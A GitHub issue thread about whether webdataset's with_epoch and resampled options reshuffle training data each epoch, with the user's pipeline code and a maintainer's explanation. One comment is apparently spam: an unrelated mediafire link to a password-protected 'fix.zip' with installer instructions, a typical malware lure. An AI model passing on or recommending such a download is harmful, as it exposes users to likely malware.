### ISSUE TITLE
Does `with_epoch(n)` + `resample=True` shuffle the data each epoch?

### ISSUE THREAD

**Issue by amyxlu** [webdataset/webdataset#388]
Thanks for the great work on the library! It's been a great help so far.

I'd like to specify a certain number of training steps before running validation. My validation loss is going up very early, despite using a very large dataset, so I'm wondering if (1) I'm doing implementing the validate-every-n-steps thing right, and (2) how to debug this. 

What I'm trying to accomplish (with a vanilla dataloader) is something like:

```
global_step = 0
for batch in train_dataloader:
    # ...
    if global_step % validate_every_n_steps:
        # loop through val_dataloader
        validate()
    global_step += 1
```

To handle this in the WebDataset-ified code, I followed the suggestions in the [DDP + Lightning issue:](https://github.com/webdataset/webdataset/issues/250)

```
dataset = (
    wds.WebDataset(
        path,
        resampled=True,
        shardshuffle=(split == "train"),
        cache_dir=self.cache_dir,
        nodesplitter=wds.split_by_node,
        workersplitter=wds.split_by_worker,
    )
    .shuffle(shuffle_buffer, initial=shuffle_initial)
    .map(lambda x: self.make_sample(x))
    .batched(self.batch_size)
    .with_epoch(self.batch_size * self.train_epoch_num_batches)
)

# unbatch, shuffle, and form final batch for SGD (if training)
dataloader_kwargs = {
    "num_workers": self.num_workers,
    "batch_size": None,
    "pin_memory": True,
    "prefetch_factor": self.prefetch_factor
}

dataloader = (
    wds.WebLoader(dataset, **dataloader_kwargs) 
    .unbatched()
    .shuffle(shuffle_buffer)
    .batched(self.batch_size)
    .with_length(num_epoch_batches)
)
```

If I do training this way, should I expect the training batch to be a different set of sequences every epoch? Thanks for your help! CC @tmbdev

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tmbdev** [comment]
What happens is:

- resampled randomly samples from the shards assigned to the node/worker
- with_epoch terminates the iteration after the given number of steps

So, in principle, you should get a new random shard sequence and random sample sequence every epoch.

Some other comments:

- you may or may not want to split by note or worker
- you probably don't want resampled during validation
- you don't need shardshuffle when you are using resampled
